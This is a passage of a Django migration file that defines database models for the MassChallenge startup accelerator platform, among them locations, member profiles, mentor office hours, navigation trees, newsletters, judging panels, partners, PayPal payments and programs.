('name', models.CharField(default='', help_text='Internal name for this check.', max_length=128, unique=True)),
('description', models.TextField(help_text='Text displayed next to checkbox. Use HTML for links.')),
('is_enabled_for_experts', models.BooleanField(default=True, help_text='This legal check is for Experts (Judges and Mentors)')),
('is_enabled_for_entrepreneurs', models.BooleanField(default=True, help_text='This legal check is for Entrepreneurs (people with Startups applying to MassChallenge)')),
],
options={
'verbose_name': 'Legal Check',
'db_table': 'accelerator_legalcheck',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_LEGALCHECK_MODEL',
},
),
migrations.CreateModel(
name='Location',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=100)),
('city', models.CharField(blank=True, default='', max_length=100)),
('state', models.CharField(blank=True, default='', help_text='State/Region/Province', max_length=100)),
('country', models.CharField(blank=True, default='', max_length=100)),
('postcode', models.CharField(blank=True, default='', max_length=20)),
('latitude', models.CharField(blank=True, default='', max_length=100)),
('longitude', models.CharField(blank=True, default='', max_length=100)),
('timezone', models.CharField(default='UTC', help_text='Timezone name from Olson Timezone database (https://en.wikipedia.org/wiki/Tz_database, https://en.wikipedia.org/wiki/List_of_tz_database_time_zones)', max_length=35)),
],
options={
'verbose_name_plural': 'locations',
'db_table': 'accelerator_location',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_LOCATION_MODEL',
},
),
migrations.CreateModel(
name='MemberProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('gender', models.CharField(choices=[('f', 'Female'), ('m', 'Male'), ('p', 'Prefer Not To State'), ('o', 'Other'), ('', 'Unknown')], default='', max_length=1)),
('phone', models.CharField(blank=True, max_length=20, validators=[django.core.validators.RegexValidator(message='Digits and +()-.x only', regex='^[0-9x.+() -]+$')], verbose_name='Phone')),
('linked_in_url', models.URLField(blank=True, verbose_name='LinkedIn profile URL')),
('facebook_url', models.URLField(blank=True, verbose_name='Facebook profile URL')),
('twitter_handle', models.CharField(blank=True, max_length=40, verbose_name='Twitter handle')),
('personal_website_url', models.URLField(blank=True, max_length=255, verbose_name='Website URL')),
('landing_page', models.CharField(blank=True, max_length=200, validators=[django.core.validators.RegexValidator('^[^:]*$', 'Must be a page within the site')], verbose_name='Current landing page within the site')),
('image', sorl.thumbnail.fields.ImageField(blank=True, help_text='Suggested size: <400px on the short side', upload_to='profile_pics', verbose_name='Profile Picture')),
('drupal_id', models.IntegerField(blank=True, null=True)),
('drupal_creation_date', models.DateTimeField(blank=True, null=True)),
('drupal_last_login', models.DateTimeField(blank=True, null=True)),
('users_last_activity', models.DateTimeField(blank=True, null=True)),
('newsletter_sender', models.BooleanField(default=False)),
],
options={
'db_table': 'accelerator_memberprofile',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_MEMBERPROFILE_MODEL',
},
),
migrations.CreateModel(
name='MentoringSpecialties',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=255, unique=True)),
],
options={
'verbose_name': 'Mentoring Specialty',
'verbose_name_plural': 'Mentoring Specialties',
'db_table': 'accelerator_mentoringspecialties',
'ordering': ['name'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_MENTORINGSPECIALTIES_MODEL',
},
),
migrations.CreateModel(
name='MentorProgramOfficeHour',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('start_date_time', models.DateTimeField(db_index=True)),
('end_date_time', models.DateTimeField(db_index=True)),
('description', models.TextField(blank=True)),
('old_location', models.CharField(choices=[('MassChallenge Boston', 'MassChallenge Boston'), ('MassChallenge Israel - Jerusalem', 'MassChallenge Israel - Jerusalem'), ('MassChallenge Israel - Tel Aviv', 'MassChallenge Israel - Tel Aviv'), ('MassChallenge Mexico', 'MassChallenge Mexico'), ('MassChallenge Rhode Island', 'MassChallenge Rhode Island'), ('MassChallenge Switzerland', 'MassChallenge Switzerland'), ('MassChallenge Texas - Austin', 'MassChallenge Texas - Austin'), ('MassChallenge Texas - Houston', 'MassChallenge Texas - Houston'), ('Remote - see description', 'Remote - see description'), ('Other - see description', 'Other - see description')], max_length=50)),
('notify_reservation', models.BooleanField(default=True)),
('topics', models.CharField(blank=True, max_length=500)),
('finalist', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='finalist_officehours', to=settings.AUTH_USER_MODEL, verbose_name='Finalist')),
('location', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_LOCATION_MODEL)),
('mentor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='mentor_officehours', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'Office Hour',
'db_table': 'accelerator_mentorprogramofficehour',
'ordering': ['start_date_time'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_MENTORPROGRAMOFFICEHOUR_MODEL',
},
),
migrations.CreateModel(
name='ModelChange',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=128, unique=True)),
('status', models.CharField(choices=[('OLD', 'OLD'), ('MIGRATING', 'MIGRATING'), ('DONE', 'DONE'), ('ERROR', 'ERROR')], default='OLD', max_length=64)),
],
options={
'db_table': 'accelerator_modelchange',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_MODELCHANGE_MODEL',
},
),
migrations.CreateModel(
name='NamedGroup',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(default='', max_length=255)),
],
options={
'db_table': 'accelerator_namedgroup',
'ordering': ['name'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_NAMEDGROUP_MODEL',
},
),
migrations.CreateModel(
name='NavTree',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('title', models.CharField(blank=True, help_text='Site tree title for presentational purposes.', max_length=100, verbose_name='Title')),
('alias', models.CharField(db_index=True, help_text='Short name to address site tree from templates.<br /><b>Note:</b> change with care.', max_length=80, unique=True, verbose_name='Alias')),
],
options={
'verbose_name_plural': 'NavTrees',
'db_table': 'accelerator_navtree',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_NAVTREE_MODEL',
},
),
migrations.CreateModel(
name='NavTreeItem',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('title', models.CharField(help_text='Site tree item title. Can contain template variables E.g.: {{ mytitle }}.', max_length=100, verbose_name='Title')),
('hint', models.CharField(blank=True, default='', help_text='Some additional information about this item that is used as a hint.', max_length=200, verbose_name='Hint')),
('url', models.CharField(db_index=True, help_text='Exact URL or URL pattern (see "Additional settings") for this item.', max_length=200, verbose_name='URL')),
('urlaspattern', models.BooleanField(db_index=True, default=False, help_text='Whether the given URL should be treated as a pattern.<br /><b>Note:</b> Refer to Django "URL dispatcher" documentation (e.g. "Naming URL patterns" part).', verbose_name='URL as Pattern')),
('hidden', models.BooleanField(db_index=True, default=False, help_text='Whether to show this item in navigation.', verbose_name='Hidden')),
('alias', sitetree.models.CharFieldNullable(blank=True, db_index=True, help_text='Short name to address site tree item from a template.<br /><b>Reserved aliases:</b> "trunk", "this-children", "this-siblings", "this-ancestor-children", "this-parent-siblings".', max_length=80, null=True, verbose_name='Alias')),
('description', models.TextField(blank=True, default='', help_text='Additional comments on this item.', verbose_name='Description')),
('inmenu', models.BooleanField(db_index=True, default=True, help_text='Whether to show this item in a menu.', verbose_name='Show in menu')),
('inbreadcrumbs', models.BooleanField(db_index=True, default=True, help_text='Whether to show this item in a breadcrumb path.', verbose_name='Show in breadcrumb path')),
('insitetree', models.BooleanField(db_index=True, default=True, help_text='Whether to show this item in a site tree.', verbose_name='Show in site tree')),
('access_loggedin', models.BooleanField(db_index=True, default=False, help_text='Check it to grant access to this item to authenticated users only.', verbose_name='Logged in only')),
('access_guest', models.BooleanField(db_index=True, default=False, help_text='Check it to grant access to this item to guests only.', verbose_name='Guests only')),
('access_restricted', models.BooleanField(db_index=True, default=False, help_text='Check it to restrict user access to this item, using Django permissions system.', verbose_name='Restrict access to permissions')),
('access_perm_type', models.IntegerField(choices=[(1, 'Any'), (2, 'All')], default=1, help_text='<b>Any</b> — user should have any of chosen permissions. <b>All</b> — user should have all chosen permissions.', verbose_name='Permissions interpretation')),
('sort_order', models.IntegerField(db_index=True, default=0, help_text='Item position among other site tree items under the same parent.', verbose_name='Sort order')),
('active_program', models.BooleanField(default=False)),
('display_single_item', models.BooleanField(default=True)),
('access_permissions', models.ManyToManyField(blank=True, to='auth.Permission', verbose_name='Permissions granting access')),
('parent', models.ForeignKey(blank=True, help_text='Parent site tree item.', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='navtreeitem_parent', to=settings.ACCELERATOR_NAVTREEITEM_MODEL, verbose_name='Parent')),
],
options={
'verbose_name_plural': 'NavTreeItems',
'db_table': 'accelerator_navtreeitem',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_NAVTREEITEM_MODEL',
},
),
migrations.CreateModel(
name='Newsletter',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=127)),
('subject', models.CharField(blank=True, help_text='Best practice: keep subject lines short', max_length=500)),
('from_addr', models.CharField(blank=True, max_length=255, null=True)),
('cc_addrs', models.CharField(blank=True, help_text='Zero or more email addresses to CC; separate with commas', max_length=500, null=True)),
('date_mailed', models.DateTimeField(blank=True, editable=False, null=True)),
],
options={
'db_table': 'accelerator_newsletter',
'ordering': ('-created_at', 'name'),
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_NEWSLETTER_MODEL',
},
),
migrations.CreateModel(
name='NewsletterReceipt',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('newsletter', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_NEWSLETTER_MODEL)),
('recipient', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'accelerator_newsletterreceipt',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_NEWSLETTERRECEIPT_MODEL',
},
),
migrations.CreateModel(
name='NodePublishedFor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
],
options={
'verbose_name': 'Node is Published For',
'verbose_name_plural': 'Node is Published For',
'db_table': 'accelerator_nodepublishedfor',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_NODEPUBLISHEDFOR_MODEL',
},
),
migrations.CreateModel(
name='NodeSubNavAssociation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
],
options={
'verbose_name': 'Node Sub Navigation Association',
'verbose_name_plural': 'Node Sub Navigation Associations',
'db_table': 'accelerator_nodesubnavassociation',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_NODESUBNAVASSOCIATION_MODEL',
},
),
migrations.CreateModel(
name='Observer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('first_name', models.CharField(blank=True, max_length=50, null=True)),
('last_name', models.CharField(max_length=50)),
('email', models.EmailField(max_length=100, verbose_name='Email address')),
('title', models.CharField(blank=True, max_length=50)),
('company', models.CharField(blank=True, max_length=50)),
('newsletter_sender', models.BooleanField(default=False)),
],
options={
'verbose_name': 'Observer',
'verbose_name_plural': 'Observers',
'db_table': 'accelerator_observer',
'ordering': ['last_name', 'first_name'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_OBSERVER_MODEL',
},
),
migrations.CreateModel(
name='Organization',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=255)),
('website_url', models.URLField(blank=True, max_length=100, verbose_name='Website URL')),
('twitter_handle', models.CharField(blank=True, help_text='Omit the "@". We\'ll add it.', max_length=40, verbose_name='Twitter handle')),
('public_inquiry_email', models.EmailField(blank=True, max_length=100, verbose_name='Email address')),
('url_slug', models.CharField(blank=True, default='', max_length=64, unique=True, validators=[django.core.validators.RegexValidator(message='Letters, numbers, and dashes only.', regex='^[\\w-]+$')])),
],
options={
'verbose_name_plural': 'Organizations',
'db_table': 'accelerator_organization',
'ordering': ['name'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_ORGANIZATION_MODEL',
},
),
migrations.CreateModel(
name='Panel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('description', models.CharField(blank=True, max_length=30)),
('status', models.CharField(choices=[('NOT STARTED', 'NOT STARTED'), ('PREVIEW', 'PREVIEW'), ('ACTIVE', 'ACTIVE'), ('COMPLETED', 'COMPLETED')], default='NOT STARTED', max_length=30)),
('applications', models.ManyToManyField(related_name='panels', through='accelerator.ApplicationPanelAssignment', to=settings.ACCELERATOR_APPLICATION_MODEL)),
('judges', models.ManyToManyField(related_name='panels', through='accelerator.JudgePanelAssignment', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'Panels',
'db_table': 'accelerator_panel',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PANEL_MODEL',
},
),
migrations.CreateModel(
name='PanelLocation',
fields=[
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('location', models.CharField(max_length=225, primary_key=True, serialize=False)),
('description', models.CharField(max_length=225)),
],
options={
'verbose_name_plural': 'Panel Locations',
'db_table': 'accelerator_panellocation',
'ordering': ['judging_round', 'description'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PANELLOCATION_MODEL',
},
),
migrations.CreateModel(
name='PanelTime',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('day', models.CharField(max_length=255)),
('time', models.CharField(max_length=255)),
('start_date_time', models.DateTimeField(null=True)),
('end_date_time', models.DateTimeField(null=True)),
],
options={
'verbose_name_plural': 'Panel Times',
'db_table': 'accelerator_paneltime',
'ordering': ['judging_round', 'start_date_time'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PANELTIME_MODEL',
},
),
migrations.CreateModel(
name='PanelType',
fields=[
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('panel_type', models.CharField(max_length=225, primary_key=True, serialize=False)),
('description', models.CharField(max_length=225)),
],
options={
'verbose_name_plural': 'Panel Types',
'db_table': 'accelerator_paneltype',
'ordering': ['judging_round', 'description'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PANELTYPE_MODEL',
},
),
migrations.CreateModel(
name='Partner',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('description', models.TextField(blank=True, help_text='This is the generic description of the Partner, shared across all Programs.', max_length=1000)),
('partner_logo', sorl.thumbnail.fields.ImageField(blank=True, upload_to='startup_pics', verbose_name='Partner Logo')),
('organization', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_ORGANIZATION_MODEL)),
],
options={
'verbose_name_plural': 'Partners',
'db_table': 'accelerator_partner',
'ordering': ['organization__name'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PARTNER_MODEL',
},
),
migrations.CreateModel(
name='PartnerTeamMember',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('partner_administrator', models.BooleanField(default=False)),
('partner', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PARTNER_MODEL)),
('team_member', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'Partner Team Members',
'db_table': 'accelerator_partnerteammember',
'ordering': ['team_member__last_name', 'team_member__first_name'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PARTNERTEAMMEMBER_MODEL',
},
),
migrations.CreateModel(
name='PayPalPayment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('token', models.CharField(max_length=100)),
('transaction', models.CharField(blank=True, max_length=100)),
('amount', models.DecimalField(decimal_places=2, default=Decimal('0.00'), max_digits=7)),
('currency_code', models.CharField(default='', max_length=3)),
('refundable', models.BooleanField(default=True)),
],
options={
'db_table': 'accelerator_paypalpayment',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PAYPALPAYMENT_MODEL',
},
),
migrations.CreateModel(
name='PayPalRefund',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('status', models.CharField(blank=True, max_length=100)),
('transaction', models.CharField(blank=True, max_length=100)),
('correlation', models.CharField(blank=True, max_length=100)),
('amount', models.DecimalField(decimal_places=2, default=Decimal('0.00'), max_digits=7)),
('payment', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PAYPALPAYMENT_MODEL)),
],
options={
'db_table': 'accelerator_paypalrefund',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PAYPALREFUND_MODEL',
},
),
migrations.CreateModel(
name='Program',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=50)),
('description', models.CharField(blank=True, max_length=500)),
('start_date', models.DateTimeField(blank=True, null=True)),
('end_date', models.DateTimeField(blank=True, null=True)),
('location', models.CharField(max_length=50)),
('program_status', models.CharField(choices=[('upcoming', 'Upcoming'), ('active', 'Active'), ('ended', 'Ended'), ('hidden', 'Hidden')], max_length=64)),
('alumni_eligible_program', models.BooleanField(default=False, help_text='Finalists will be added to our Global Alumni Program upon this program being set to "Ended"')),
('currency_code', models.CharField(max_length=3)),
('early_application_fee', models.DecimalField(decimal_places=2, max_digits=7)),
('regular_application_fee', models.DecimalField(decimal_places=2, max_digits=7)),
('regular_fee_suffix', models.CharField(blank=True, max_length=20)),
('interested_judge_message', models.TextField(blank=True, help_text='You may use HTML, including links')),
('approved_judge_message', models.TextField(blank=True, help_text='You may use HTML, including links')),
('interested_mentor_message', models.TextField(blank=True, help_text='You may use HTML, including links')),
('approved_mentor_message', models.TextField(blank=True, help_text='You may use HTML, including links')),
('interested_speaker_message', models.TextField(blank=True, help_text='You may use HTML, including links')),
('approved_speaker_message', models.TextField(blank=True, help_text='You may use HTML, including links')),
('interested_office_hours_message', models.TextField(blank=True, help_text='You may use HTML, including links')),
('approved_office_hours_message', models.TextField(blank=True, help_text='You may use HTML, including links')),
('refund_code_support', models.CharField(choices=[('enabled', 'Enabled'), ('view-submitted-only', 'View Submitted Only'), ('disabled', 'Disabled')], default='enabled', max_length=64)),
('many_codes_per_partner', models.BooleanField(default=False, help_text='If true, then a given application may apply more than one refund code from the same partner for this program', verbose_name='Allow multiple refund codes per partner')),
('url_slug', models.CharField(default='', max_length=30)),
('accepting_mentors_and_goals', models.BooleanField(default=False)),
('overview_start_date', models.DateTimeField(blank=True, help_text='Time is in UTC', null=True)),
('overview_deadline_date', models.DateTimeField(blank=True, help_text='Time is in UTC', null=True)),
('eventbrite_organizer_id', models.CharField(blank=True, max_length=20, null=True)),
('program_overview_link', models.URLField(blank=True, help_text='URL of the program overview page, ex: https://masschallenge.org/programs-boston', max_length=255, null=True)),
],
options={
'verbose_name_plural': 'Programs',
'db_table': 'accelerator_program',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PROGRAM_MODEL',
},
),
migrations.CreateModel(
name='ProgramCycle',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=128)),
('short_name', models.CharField(blank=True, max_length=32, null=True)),
('applications_open', models.BooleanField(default=False)),
('application_open_date', models.DateTimeField(blank=True, null=True)),
('application_early_deadline_date', models.DateTimeField(blank=True, null=True)),
('application_final_deadline_date', models.DateTimeField(blank=True, null=True)),
('advertised_final_deadline', models.DateTimeField(blank=True, null=True)),
('accepting_references', models.BooleanField(default=False)),
('hidden', models.BooleanField(default=False)),
('default_application_type', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='application_type_for', to=settings.ACCELERATOR_APPLICATIONTYPE_MODEL)),
('default_overview_application_type', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='default_overview_application_type_for', to=settings.ACCELERATOR_APPLICATIONTYPE_MODEL)),
],
options={
'verbose_name_plural': 'program cycles',
'db_table': 'accelerator_programcycle',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PROGRAMCYCLE_MODEL',
},
),
migrations.CreateModel(
name='ProgramFamily',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=128)),
('short_description', models.TextField(blank=True, help_text='You may use HTML, including links')),
('url_slug', models.CharField(default='', max_length=30)),
('email_domain', models.CharField(default='', help_text='Base domain for role-based email', max_length=30)),
('phone_number', models.CharField(default='', help_text='Phone number for this program (local form)', max_length=30)),
('physical_address', models.TextField(default='')),
('office_hour_bcc', models.EmailField(blank=True, help_text='An email address to bcc whenever office hours are created, deleted, or modified in this program family', max_length=100, null=True)),
('is_open_for_startups', models.BooleanField(default=False, help_text='Whether this ProgramFamily should be available to entrepreneurs')),
('is_open_for_experts', models.BooleanField(default=False, help_text='Whether this ProgramFamily should be available to experts')),
('use_site_tree_side_nav', models.BooleanField(default=False, help_text='Show the new-style side navigation')),
('timezone', models.CharField(default='UTC', help_text='Timezone name from Olson Timezone database (https://en.wikipedia.org/wiki/Tz_database)', max_length=35)),
],
options={
'verbose_name_plural': 'program families',
'db_table': 'accelerator_programfamily',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PROGRAMFAMILY_MODEL',
},
),
migrations.CreateModel(
name='ProgramFamilyLocation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('primary', models.BooleanField()),
('location', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_LOCATION_MODEL)),
('program_family', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAMFAMILY_MODEL)),
],
options={
'verbose_name': 'Program Family Location',
'verbose_name_plural': 'Program Family Locations',
'db_table': 'accelerator_programfamilylocation',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PROGRAMFAMILYLOCATION_MODEL',
},
),
migrations.CreateModel(
name='ProgramOverride',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=50)),
('applications_open', models.BooleanField(default=False)),
('application_open_date', models.DateTimeField(blank=True, null=True)),
('application_early_deadline_date', models.DateTimeField(blank=True, null=True)),
('application_final_deadline_date', models.DateTimeField(blank=True, null=True)),
('early_application_fee', models.DecimalField(decimal_places=2, default=Decimal('0.00'), max_digits=7)),
('regular_application_fee', models.DecimalField(decimal_places=2, default=Decimal('0.00'), max_digits=7)),
('cycle', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='program_overrides', to=settings.ACCELERATOR_PROGRAMCYCLE_MODEL)),
('program', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL)),
],
options={
'verbose_name_plural': 'Program Overrides',
'db_table': 'accelerator_programoverride',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PROGRAMOVERRIDE_MODEL',
},
),
migrations.CreateModel(
name='ProgramPartner',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('description', models.TextField(blank=True, help_text='This is the description of the Partner SPECIFICALLY IN THE CONTEXT OF THE PROGRAM. (Distinct from the generic description of the Partner.) For example, description of In-Kind sponsorship deals specific to a Program would go here.', max_length=2000)),
('partner', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PARTNER_MODEL)),
],
options={
'verbose_name_plural': 'Program Partner',
'db_table': 'accelerator_programpartner',
'ordering': ['program__name', 'partner_type__sort_order', 'partner'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PROGRAMPARTNER_MODEL',
},
),
migrations.CreateModel(
name='ProgramPartnerType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('partner_type', models.CharField(max_length=50)),
('description', models.CharField(blank=True, max_length=200)),
('feature_in_footer', models.BooleanField(default=False)),
('sort_order', models.IntegerField(blank=True, null=True)),
('badge_image', sorl.thumbnail.fields.ImageField(blank=True, upload_to='badge_images')),
('badge_display', models.CharField(choices=[('NONE', 'None'), ('PARTNER_LIST', 'Only on partner list'), ('PARTNER_PROFILE', 'Only on partner profile'), ('PARTNER_LIST_AND_PROFILE', 'Partner list and profile')], default='NONE', max_length=30)),
('program', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL)),
],
options={
'verbose_name_plural': 'Program Partner Types',
'db_table': 'accelerator_programpartnertype',
'ordering': ['program', 'sort_order'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PROGRAMPARTNERTYPE_MODEL',
},
),
migrations.CreateModel(
name='ProgramRole',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(db_index=True, max_length=255, unique=True)),
('landing_page', models.CharField(blank=True, max_length=255, null=True)),
('newsletter_recipient', models.BooleanField(default=False)),
('program', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL)),
],
options={
'verbose_name': 'Program Role',
'verbose_name_plural': 'Program Roles',
'db_table': 'accelerator_programrole',
'ordering': ['name'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PROGRAMROLE_MODEL',
},
),
migrations.CreateModel(
name='ProgramRoleGrant',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('person', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
